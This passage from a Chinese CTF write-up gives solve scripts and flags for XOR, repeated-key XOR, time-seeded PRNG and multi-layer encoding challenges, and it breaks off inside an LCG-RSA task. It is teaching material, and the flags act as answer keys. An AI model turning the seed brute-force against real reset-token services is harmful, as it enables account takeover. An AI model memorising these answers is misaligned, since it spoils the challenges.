class=\"wp-block-paragraph\"><strong>\u6ce8\u518c\u7801<\/strong> <code>18DE-56A6-7B08-D327-3746<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Flag<\/strong> <code>flag{4c731fc9bdfd9b15_orbit_unlock}<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"night-market\">Night Market<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u591c\u5e02\u7ba1\u7406\u5458\u7559\u4e0b\u4e86\u4e00\u4e2a\u5c0f\u7a0b\u5e8f\uff0c\u636e\u8bf4\u53ea\u6709\u8f93\u5165\u6b63\u786e\u7684\u901a\u884c\u53e3\u4ee4\uff0c\u644a\u4f4d\u706f\u724c\u624d\u4f1a\u4eae\u8d77\u3002 \u4f60\u62ff\u5230\u4e86\u6821\u9a8c\u7a0b\u5e8f\u548c\u51e0\u4efd\u53ef\u7591\u7684\u5b57\u8282\u6570\u7ec4\u3002\u8bf7\u9006\u5411\u7a0b\u5e8f\u4e2d\u7684 XOR \u53d8\u6362\u903b\u8f91\uff0c\u8fd8\u539f\u539f\u59cb\u8f93\u5165\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">37 \u5b57\u7b26\u6d41\u5bc6\u7801\u9a8c\u8bc1\u7a0b\u5e8f\u3002\u8f93\u5165 ticket \u7ecf\u4f4d\u7f6e\u7f6e\u6362 + \u72b6\u6001\u53cd\u9988\u6d41\u5bc6\u7801 XOR \u52a0\u5bc6\u540e\u4e0e <code>want<\/code> \u6570\u7ec4\u6bd4\u5bf9\u3002\u7531\u4e8e\u72b6\u6001\u66f4\u65b0\u4ec5\u4f9d\u8d56 cipher \u503c\uff0c\u800c cipher \u5fc5\u987b\u7b49\u4e8e <code>want[i]<\/code> \u624d\u80fd\u901a\u8fc7\u9a8c\u8bc1\uff0c\u6545\u53ef\u6b63\u5411\u63a8\u6f14\u51fa\u5b8c\u6574 ticket\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u5206\u6790\u6d41\u5bc6\u7801\u7ed3\u6784\">1: \u5206\u6790\u6d41\u5bc6\u7801\u7ed3\u6784<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><code>check_ticket<\/code> \u51fd\u6570\u5bf9\u6bcf\u4e2a\u4f4d\u7f6e <code>i<\/code> \u6267\u884c\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>pos = route_at(i)<\/code> \u2014 \u901a\u8fc7 <code>box_a[i] ^ (i*19+0x5d)<\/code> \u6253\u4e71\u8bfb\u53d6\u4f4d\u7f6e<\/li>\n\n\n\n<li><code>cipher = ticket[pos] ^ stream_at(i, state)<\/code> \u2014 \u6d41\u5bc6\u7801 XOR<\/li>\n\n\n\n<li><code>mixed[i] = cipher<\/code> \u2014 \u5b58\u5165\u7ed3\u679c\u6570\u7ec4<\/li>\n\n\n\n<li><code>state = next_state(i, state, cipher)<\/code> \u2014 \u66f4\u65b0\u72b6\u6001<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8 <code>mixed == want<\/code> \u624d\u901a\u8fc7\u9a8c\u8bc1\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u6b63\u5411\u53cd\u63a8-ticket\">2: \u6b63\u5411\u53cd\u63a8 ticket<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9a8c\u8bc1\u901a\u8fc7\u65f6 <code>cipher = mixed[i] = want[i]<\/code> \u5b8c\u5168\u5df2\u77e5\uff0c<code>state<\/code> \u66f4\u65b0\u4e5f\u53ea\u4f9d\u8d56\u5df2\u77e5\u503c\uff0c\u56e0\u6b64\u53ef\u4ece\u521d\u59cb <code>state=0xa6<\/code> \u9010\u8f6e\u8ba1\u7b97\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>ticket[pos] = want[i] ^ stream_at(i, state)<\/code><\/li>\n\n\n\n<li><code>state = next_state(i, state, want[i])<\/code> TICKET_LEN = 37 box_a = bytes([0x43,0x69,0xa0,0x92,0xb5,0xad,0xcc,0xe8,0xf5,0x2c,0x0e,0x27,<br>0x57,0x56,0x7a,0x65,0x88,0xb3,0xbd,0xd4,0xc1,0xe7,0xfe,0x30,<br>0x28,0x23,0x4c,0x58,0x79,0x94,0x8d,0xbd,0x9c,0xdf,0xc3,0xe2,0x05])<br>box_b = bytes([0xd3,0xb5,0x18,0xba,0xe4,0xfa,0x2a,0xba,0x9d,0x37,0xc9,0xae,<br>0xd6,0x76,0xc6,0x03])<br>want = bytes([0x8e,0x60,0xb8,0x44,0x5e,0x3f,0x42,0xa2,0xce,0x14,0x20,0x7a,<br>0x0e,0x6c,0xa8,0xb0,0xb2,0xe7,0xaf,0xaf,0x3f,0xfa,0xf0,0x50,<br>0xa9,0xe7,0x7e,0x40,0x55,0x04,0x86,0xe9,0xf4,0x82,0x1e,0x47,0xa9]) def rol8(x, r):<br>return ((x &lt;&lt; r) | (x &gt;&gt; (8 &#8211; r))) &amp; 0xff def route_at(i):<br>return box_a[i] ^ ((i * 19 + 0x5d) &amp; 0xff) def seed_at(i):<br>return box_b[i] ^ ((i * 23 + 0x91) &amp; 0xff) def stream_at(i, state):<br>a = seed_at((i * 7 + 3) &amp; 15)<br>b = seed_at((i * 5 + 11) &amp; 15)<br>p = (i * 0x3d + 0x5b) &amp; 0xff<br>return (rol8((a + i) &amp; 0xff, 3) ^<br>rol8((b ^ (i * 0x29)) &amp; 0xff, 1) ^ state ^ p) &amp; 0xff def next_state(i, state, cipher):<br>a = seed_at((i * 7 + 3) &amp; 15)<br>spice = (i * 13 + 0x37) &amp; 0xff<br>return rol8((state ^ cipher ^ a ^ spice) &amp; 0xff, 1) state = 0xa6<br>ticket = [0] * TICKET_LEN<br>for i in range(TICKET_LEN):<br>pos = route_at(i)<br>ticket[pos] = want[i] ^ stream_at(i, state)<br>state = next_state(i, state, want[i]) flag = bytes(ticket).decode()<br>print(flag)<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f97\u5230flag\uff1a<code>flag{neon_xor_chain_nFR7059MIEPeN9o4}<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u5bc6\u7801\">\u5bc6\u7801<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"night-watch\">Night Watch<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u67d0\u53f0\u65e7\u7f51\u5173\u4f1a\u5728\u5348\u591c\u5bfc\u51fa\u4e00\u4efd\u5ba1\u8ba1\u8bb0\u5f55\u3002\u7ba1\u7406\u5458\u4e3a\u4e86\u56fe\u65b9\u4fbf\uff0c\u4f7f\u7528\u201c\u77ed\u5bc6\u94a5\u5faa\u73af\u5f02\u6216\u201d\u7684\u65b9\u5f0f\u4fdd\u62a4\u6574\u4efd\u6587\u4ef6\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u73b0\u5728\u4f60\u62ff\u5230\u4e86\u5bfc\u51fa\u7684\u5bc6\u6587 ciphertext.bin\u3002\u8bf7\u6062\u590d\u660e\u6587\u5e76\u63d0\u4ea4\u5176\u4e2d\u7684 flag\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5df2\u77e5\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u660e\u6587\u662f\u4ee5 ASCII \u4e3a\u4e3b\u7684\u65e5\u5fd7\/\u5ba1\u8ba1\u6587\u672c\uff1b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u52a0\u5bc6\u7b97\u6cd5\u662f repeated-key XOR\uff0c\u5373 key \u4f1a\u5faa\u73af\u4f7f\u7528\uff1b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">key \u662f\u53ef\u6253\u5370\u5b57\u7b26\u7ec4\u6210\u7684\u77ed\u5b57\u7b26\u4e32\uff0c\u4f46\u957f\u5ea6\u672a\u77e5\uff1b<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">40630 \u5b57\u8282\u5bc6\u6587\uff0c\u4f7f\u7528\u77ed\u5bc6\u94a5\u5faa\u73af\u5f02\u6216\u52a0\u5bc6 ASCII \u5ba1\u8ba1\u65e5\u5fd7\u3002\u901a\u8fc7\u91cd\u5408\u6307\u6570\uff08IC\uff09\u786e\u5b9a\u5bc6\u94a5\u957f\u5ea6\u4e3a 17\uff0c\u9010\u4f4d\u7f6e\u9891\u7387\u5206\u6790\u6062\u590d\u5bc6\u94a5 <code>Nebula_Rook_2026!<\/code>\uff0c\u89e3\u5bc6\u5f97 flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u786e\u5b9a\u5bc6\u94a5\u957f\u5ea6\">1: \u786e\u5b9a\u5bc6\u94a5\u957f\u5ea6<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u4e0d\u540c\u5bc6\u94a5\u957f\u5ea6\u8ba1\u7b97\u91cd\u5408\u6307\u6570\uff08Index of Coincidence\uff09\u3002\u968f\u673a\u6570\u636e IC \u2248 0.0118\uff0c\u82f1\u8bed\u6587\u672c IC \u2248 0.065\u3002\u5728 len=17 \u548c len=34\uff082\u00d717\uff09\u5904 IC \u9aa4\u5347\u81f3 ~0.037\uff0c\u786e\u8ba4\u5bc6\u94a5\u957f\u5ea6\u4e3a 17\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u9010\u4f4d\u7834\u89e3\u5bc6\u94a5\">2: \u9010\u4f4d\u7834\u89e3\u5bc6\u94a5<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06\u5bc6\u6587\u6309 17 \u4e2a\u504f\u79fb\u4f4d\u7f6e\u5206\u4e3a 17 \u7ec4\uff0c\u6bcf\u7ec4\u72ec\u7acb\u5355\u5b57\u8282 XOR\u3002\u5bf9\u6bcf\u4e2a\u4f4d\u7f6e\u904d\u5386\u53ef\u6253\u5370 ASCII (0x20-0x7E)\uff0c\u4ee5\u82f1\u8bed\u5b57\u6bcd\u9891\u7387\u8bc4\u5206\uff0c\u9009\u6700\u4f18\u5b57\u8282\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    data = open('ciphertext.bin', 'rb').read()\n\n    def score_text(text):\n        s = 0\n        for b in text:\n            if 0x20 &lt;= b &lt;= 0x7e:\n                s += 1\n                c = chr(b).lower()\n                if c in 'etaoinshrdl': s += 2\n                elif c in 'cumwfgypbvkjxqz': s += 0.5\n            elif b in (0x0a, 0x0d, 0x09): s += 0.5\n            else: s -= 3\n        return s \/ max(len(text), 1)\n\n    kl = 17\n    key = &#91;]\n    for offset in range(kl):\n        chunk = data&#91;offset::kl]\n        best = max(range(0x20, 0x7f),\n                   key=lambda kb: score_text(bytes(&#91;b ^ kb for b in chunk])))\n        key.append(best)\n\n    key = bytes(key)\n    print(f\"Key: {key.decode()}\")  # Nebula_Rook_2026!\n\n    plain = bytes(data&#91;i] ^ key&#91;i % kl] for i in range(len(data)))\n    # Find flag\n    idx = plain.find(b'LHFLAG{')\n    end = plain.find(b'}', idx)\n    print(plain&#91;idx:end+1].decode())<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"flag\">Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{r3p3at_x0r_stat_leak_6f2c9a18}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u6253\u7834\u65f6\u95f4\u80f6\u56ca\">\u6253\u7834\u65f6\u95f4\u80f6\u56ca<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u67d0\u5bc6\u7801\u91cd\u7f6e\u670d\u52a1\u5728\u542f\u52a8\u65f6\u4f7f\u7528 int(time.time()) \u4f5c\u4e3a Python\u4e2drandom.Random\u7684\u79cd\u5b50\u3002 \u5b83\u4f1a\u5148\u751f\u6210\u4e00\u4e2a\u516c\u5f00\u7684\u91cd\u7f6e token\uff0c\u7136\u540e\u7ee7\u7eed\u7528\u540c\u4e00\u4e2a PRNG \u751f\u6210\u7ba1\u7406\u5458 PIN \u548c\u52a0\u5bc6 flag \u7684\u5bc6\u94a5\u6750\u6599\u3002 \u4f60\u62ff\u5230\u4e86\u6e90\u7801 chall.py\u548c\u4e00\u6b21\u771f\u5b9e\u8fd0\u884c\u7559\u4e0b\u7684 public_log.txt\u3002\u670d\u52a1\u542f\u52a8\u65f6\u95f4\u53ea\u77e5\u9053\u4e00\u4e2a\u5927\u81f4\u8303\u56f4\u3002 \u8bf7\u6062\u590d flag<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u9605\u8bfb <code>chall.py<\/code> \u6e90\u7801\uff0c\u5173\u952e\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    seed = int(time.time())          # \u2460 \u79cd\u5b50 = \u542f\u52a8\u65f6\u7684 Unix \u65f6\u95f4\u6233\uff08\u79d2\u7ea7\u7cbe\u5ea6\uff09\n    rnd = random.Random(seed)\n\n    burn_count = 300 + (rnd.getrandbits(16) % 700)  # \u2461 \u968f\u673a\"\u9884\u70ed\" 300~999 \u6b21\n    for _ in range(burn_count):\n        rnd.getrandbits(8 + 8 * (rnd.getrandbits(2) % 4))  # \u2462 \u6d88\u8017\u968f\u673a\u6570\n\n    reset_token = \"...\".format(...)   # \u2463 \u516c\u5f00\u7684 reset token\uff08\u5df2\u77e5\uff09\n    admin_pin    = \"...\"             # \u2464 \u7ba1\u7406\u5458 PIN\uff08\u672a\u77e5\uff09\n    nonce        = bytes(...)        # \u2465 \u52a0\u5bc6\u7528\u7684 nonce\uff08\u5df2\u77e5\uff09\n    key_material = bytes(...)        # \u2466 \u52a0\u5bc6\u7528\u7684\u5bc6\u94a5\u6750\u6599\uff08\u672a\u77e5\uff09\n\n    key = sha256(key_material + reset_token + admin_pin)\n    ciphertext = xor_stream(flag, key, nonce)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6574\u4e2a\u7cfb\u7edf\u4f7f\u7528 <strong>\u540c\u4e00\u4e2a PRNG \u5b9e\u4f8b<\/strong> \u4f9d\u6b21\u751f\u6210\u6240\u6709\u503c\u3002<code>reset_token<\/code> \u662f\u516c\u5f00\u7684\uff0c\u53ef\u4ee5\u4f5c\u4e3a\u9a8c\u8bc1\u79cd\u5b50\u7684&#8221;\u68c0\u67e5\u70b9&#8221;\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"\u7834\u7efd\">\u7834\u7efd<\/h5>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u79cd\u5b50\u7a7a\u95f4\u6781\u5c0f<\/strong>\uff1a<code>int(time.time())<\/code> \u53ea\u6709\u79d2\u7ea7\u7cbe\u5ea6\uff0c\u800c\u9898\u76ee\u7ed9\u51fa\u4e86\u670d\u52a1\u542f\u52a8\u65f6\u95f4\u8303\u56f4\u2014\u20142026-05-16 09:00:00 ~ 13:00:00\uff08\u4e9a\u6d32\/\u65b0\u52a0\u5761\uff0cUTC+8\uff09\uff0c\u5171 4 \u5c0f\u65f6 = <strong>14400 \u4e2a\u5019\u9009\u79cd\u5b50<\/strong>\u3002<\/li>\n\n\n\n<li><strong>\u516c\u5f00 token \u53ef\u9a8c\u8bc1<\/strong>\uff1a<code>reset_token<\/code> \u5728 <code>public_log.txt<\/code> \u4e2d\u5df2\u77e5\uff0c\u7528\u5b83\u5373\u53ef\u5224\u5b9a\u54ea\u4e2a\u79cd\u5b50\u662f\u6b63\u786e\u7684\u3002<\/li>\n\n\n\n<li><strong>PRNG \u5b8c\u5168\u53ef\u590d\u73b0<\/strong>\uff1aPython \u7684 <code>random.Random(seed)<\/code> \u662f\u7eaf\u786e\u5b9a\u6027\u7684 Mersenne Twister\uff0c\u7ed9\u5b9a\u76f8\u540c\u79cd\u5b50 \u2192 \u76f8\u540c\u8f93\u51fa\u5e8f\u5217\u3002<\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u8f6c\u6362\u65f6\u95f4\u8303\u56f4\">1 \u2014 \u8f6c\u6362\u65f6\u95f4\u8303\u56f4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e9a\u6d32\/\u65b0\u52a0\u5761 (UTC+8) \u2192 UTC\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5f53\u5730\u65f6\u95f4<\/th><th>UTC<\/th><\/tr><\/thead><tbody><tr><td>2026-05-16 09:00:00<\/td><td>2026-05-16 01:00:00<\/td><\/tr><tr><td>2026-05-16 13:00:00<\/td><td>2026-05-16 05:00:00<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u5e94 Unix \u65f6\u95f4\u6233\uff1a<code>1778893200<\/code> ~ <code>1778907600<\/code>\uff0c\u5171 14400 \u4e2a\u5019\u9009\u79cd\u5b50\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u7206\u7834\u79cd\u5b50\">2 \u2014 \u7206\u7834\u79cd\u5b50<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u6bcf\u4e2a\u5019\u9009\u79cd\u5b50\uff0c\u7528\u5b8c\u5168\u76f8\u540c\u7684 PRNG \u64cd\u4f5c\u6d41\u7a0b\u590d\u73b0 <code>reset_token<\/code>\uff0c\u4e0e\u76ee\u6807\u503c\u6bd4\u5bf9\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    TARGET = \"73cf64abf63757312bcee076\"\n\n    def try_seed(seed):\n        rnd = random.Random(seed)\n        burn_count = 300 + (rnd.getrandbits(16) % 700)\n        for _ in range(burn_count):\n            rnd.getrandbits(8 + 8 * (rnd.getrandbits(2) % 4))\n        reset_token = \"\".join(f\"{rnd.getrandbits(8):02x}\" for _ in range(12))\n        return reset_token\n\n    for seed in range(START_TS, END_TS + 1):\n        if try_seed(seed) == TARGET:\n            print(f\"FOUND: {seed}\")\n            break<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ea6 2 \u79d2\u540e\u547d\u4e2d\uff1a <code>Seed: 1778896043<\/code><\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-\u6062\u590d-flag\">3 \u2014 \u6062\u590d flag<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u6b63\u786e\u7684\u79cd\u5b50\u5b8c\u6574\u590d\u73b0 PRNG \u5e8f\u5217\uff0c\u4f9d\u6b21\u63d0\u53d6 <code>admin_pin<\/code>\u3001<code>nonce<\/code>\u3001<code>key_material<\/code>\uff0c\u63a8\u5bfc AES-like XOR \u6d41\u7684\u5bc6\u94a5\uff0c\u89e3\u5bc6 ciphertext\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    rnd = random.Random(1778896043)\n    # ... \u590d\u73b0 burn \u9636\u6bb5 ...\n    reset_token = ...  # \u9a8c\u8bc1\u901a\u8fc7\n    admin_pin    = \"093031\"\n    nonce        = bytes.fromhex(\"eefdeebaded7d55f7c855f98\")\n    key_material = bytes.fromhex(\"4b68302da289f4c775e0b966b423163b...\")\n\n    key = sha256(key_material + reset_token.encode() + admin_pin.encode())\n    flag = xor_stream(ciphertext, key, nonce)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"flag\">Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{t1m3_s33d_rng_can_b3_gu3ss3d_4f7c9a}<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u603b\u7ed3\">\u603b\u7ed3<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9053\u9898\u7684\u6838\u5fc3\u6559\u8bad\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong><code>time.time()<\/code> \u4e0d\u662f\u5bc6\u7801\u5b66\u5b89\u5168\u7684\u968f\u673a\u6e90<\/strong>\u3002\u79d2\u7ea7\u7cbe\u5ea6\u7684\u79cd\u5b50\u7a7a\u95f4\u6781\u5c0f\uff08\u672c\u9898\u4ec5 14400 \u79cd\u53ef\u80fd\uff09\uff0c\u914d\u5408\u4e00\u4e2a\u5df2\u77e5\u7684 PRNG \u8f93\u51fa\u5373\u53ef\u5728\u6570\u79d2\u5185\u7206\u7834\u3002<\/li>\n\n\n\n<li>\u6d89\u53ca\u5b89\u5168\u7684\u968f\u673a\u6570\u751f\u6210\u5e94\u4f7f\u7528 <code>secrets<\/code> \u6a21\u5757\uff08Python\uff09\u6216 <code>\/dev\/urandom<\/code>\uff0c\u800c\u975e <code>random<\/code> \u6a21\u5757\u3002<\/li>\n\n\n\n<li>\u5373\u4f7f\u52a0\u4e86&#8221;\u9884\u70ed&#8221;\uff08burn\uff09\u9636\u6bb5\uff0c\u53ea\u8981\u6574\u4e2a PRNG \u72b6\u6001\u662f\u7531\u540c\u4e00\u4e2a\u79cd\u5b50\u6d3e\u751f\u7684\uff0c\u653b\u51fb\u8005\u4f9d\u7136\u53ef\u4ee5\u5b8c\u7f8e\u590d\u73b0\u3002<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"morph-encoder\">Morph Encoder<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u670b\u53cb\u8bf4\u666e\u901a\u7f16\u7801\u9898\u5728 AI \u9762\u524d\u592a\u5bb9\u6613\u4e86\uff0c\u4e8e\u662f\u6211\u7ed9\u540c\u4e00\u6bb5\u6570\u636e\u6362\u4e86\u51e0\u526f\u201c\u9762\u5b54\u201d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9644\u4ef6\u4e2d\u7ed9\u51fa\u4e86 <a href=\"http:\/\/chall.py\">chall.py<\/a> \u548c output.txt\u3002\u8bf7\u5206\u6790\u7f16\u7801\u6d41\u7a0b\uff0c\u6062\u590d\u539f\u59cb flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u81ea\u5b9a\u4e49\u591a\u5c42\u7f16\u7801\u94fe\uff1atwist XOR \u2192 base85 \u2192 custom base64 \u2192 chunk_mirror \u2192 snake_fence \u2192 custom base32\u3002\u9010\u5c42\u9006\u5411\u5373\u53ef\u6062\u590d flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u5206\u6790\u7f16\u7801\u94fe\">1: \u5206\u6790\u7f16\u7801\u94fe<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><code>chall.py<\/code> \u5b9a\u4e49\u4e86 5 \u5c42\u53d8\u6362\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5c42<\/th><th>\u51fd\u6570<\/th><th>\u64cd\u4f5c<\/th><\/tr><\/thead><tbody><tr><td>1<\/td><td><code>twist<\/code><\/td><td>XOR <code>(i*73+41) &amp; 0xff<\/code>\uff08\u81ea\u9006\uff09<\/td><\/tr><tr><td>2<\/td><td><code>base64.b85encode<\/code><\/td><td>\u6807\u51c6 base85<\/td><\/tr><tr><td>3<\/td><td><code>custom_b64<\/code><\/td><td>\u6807\u51c6 base64 \u6362\u81ea\u5b9a\u4e49\u5b57\u6bcd\u8868 <code>M64<\/code><\/td><\/tr><tr><td>4<\/td><td><code>chunk_mirror<\/code><\/td><td>5 \u5b57\u7b26\u5206\u5757 \u2192 \u5947\u5757\u53cd\u8f6c \u2192 \u53f3\u65cb 3 \u5757<\/td><\/tr><tr><td>5<\/td><td><code>snake_fence<\/code><\/td><td>7 \u5217\u6805\u680f\uff0c\u5947\u6570\u5217\u53cd\u8f6c<\/td><\/tr><tr><td>6<\/td><td><code>custom_b32<\/code><\/td><td>\u6807\u51c6 base32 \u6362\u81ea\u5b9a\u4e49\u5b57\u6bcd\u8868 <code>M32<\/code> \u2192 8 \u5b57\u7b26\u7ec4\u53cd\u8f6c<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u9010\u5c42\u9006\u5411\">2: \u9010\u5c42\u9006\u5411<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9006\u5411\u987a\u5e8f\u4e0e\u7f16\u7801\u76f8\u53cd\uff1acustom_b32 \u2192 snake_fence \u2192 chunk_mirror \u2192 custom_b64 \u2192 base85 \u2192 twist\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    import base64\n\n    STD64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"\n    M64   = \"qazwsxedcrfvtgbyhnujmiklopQAZWSXEDCRFVTGBYHNUJMIKLOP9876543210-_\"\n    STD32 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567\"\n    M32   = \"ZYXWVUTSRQPONMLKJIHGFEDCBA765432\"\n\n    output = \"NI7HT.KADDH46L.TYAS5EPV.VMNT5AOR.MQNWZ7IW.LQWC5I77.TYWVLDO3.MUNEL7QF.T4XE3EGG.MUDEFA7C.LBBTFGYA.LQNFR56K.MMFWR7WG\"\n\n    # 1) Reverse custom_b32\n    groups = output.split(\".\")&#91;::-1]\n    morphed = \"\".join(groups)\n    trans_b32 = str.maketrans(M32, STD32)\n    b32_str = morphed.translate(trans_b32)\n    b32_str += \"=\" * ((-len(b32_str)) % 8)\n    s = base64.b32decode(b32_str).decode()\n\n    # 2) Reverse snake_fence (width=7)\n    width, n_rows = 7, len(s) \/\/ 7\n    cols = &#91;]\n    for c in range(width):\n        col = list(s&#91;c * n_rows:(c + 1) * n_rows])\n        if c % 2 == 1:\n            col = col&#91;::-1]\n        cols.append(col)\n    rows = &#91;\"\".join(cols&#91;c]&#91;i] for c in range(width)) for i in range(n_rows)]\n    s = \"\".join(rows).rstrip(\"#\")\n\n    # 3) Reverse chunk_mirror (chunk=5, rot=3)\n    blocks = &#91;s&#91;i:i+5] for i in range(0, len(s), 5)]\n    blocks = blocks&#91;3:] + blocks&#91;:3]   # left-rotate by 3\n    blocks = &#91;b&#91;::-1] if i % 2 else b for i, b in enumerate(blocks)]\n    s = \"\".join(blocks).rstrip(\"~\")\n\n    # 4) Reverse custom_b64\n    trans_b64 = str.maketrans(M64, STD64)\n    b64_str = s.translate(trans_b64)\n    b64_str += \"=\" * ((-len(b64_str)) % 4)\n    b85_str = base64.b64decode(b64_str).decode()\n\n    # 5) Reverse base85\n    twisted = base64.b85decode(b85_str)\n\n    # 6) Reverse twist\n    flag = bytes((b ^ ((i * 73 + 41) &amp; 0xff)) for i, b in enumerate(twisted))\n    print(flag.decode())<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{m0rph_Enc0ding_9f42b6c1a8}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"lcg-rsa\u7684\u5f3a\u5f3a\u8054\u624b\">LCG-RSA\u7684\u5f3a\u5f3a\u8054\u624b<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u4e00\u6b21\u8c03\u8bd5\u65e5\u5fd7\u4e2d\u610f\u5916\u6cc4\u9732\u4e86\u67d0\u4e2a\u7ebf\u6027\u540c\u4f59\u751f\u6210\u5668\uff08LCG\uff09\u7684\u8fde\u7eed\u8f93\u51fa\u3002\u670d\u52a1\u7aef\u4f7f\u7528\u540c\u4e00\u4e2a LCG \u7684\u540e\u7eed\u72b6\u6001\u751f\u6210 RSA \u7684\u4e24\u4e2a\u7d20\u6570\uff0c\u5e76\u5bf9 flag \u8fdb\u884c\u4e86\u52a0\u5bc6\u3002 \u8bf7\u6839\u636e\u9644\u4ef6\u4e2d\u7684 task.py \u548c output.txt \u6062\u590d flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u9898\u76ee\u6e90\u7801\u5206\u6790\">\u9898\u76ee\u6e90\u7801\u5206\u6790<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u6838\u5fc3\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    class LCG:\n        def __init__(self, m: int, a: int, b: int, seed: int):\n            self.m = m\n            self.a = a\n            self.b = b\n            self.x = seed\n\n        def next(self) -&gt; int:\n            self.x = (self.a * self.x + self.b) % self.m\n            return self.x\n\n    rng = LCG(M, A, B, SEED)\n\n    leak = &#91;rng.next() for _ in range(10)]\n\n    p = next_prime(rng.next())\n    q = next_prime(rng.next())\n\n    n = p * q\n    e = 65537\n    c = pow(int.from_bytes(FLAG, \"big\"), e, n)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ece\u4ee3\u7801\u53ef\u4ee5\u770b\u51fa\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u9898\u76ee\u4f7f\u7528\u4e86\u4e00\u4e2a\u7ebf\u6027\u540c\u4f59\u751f\u6210\u5668 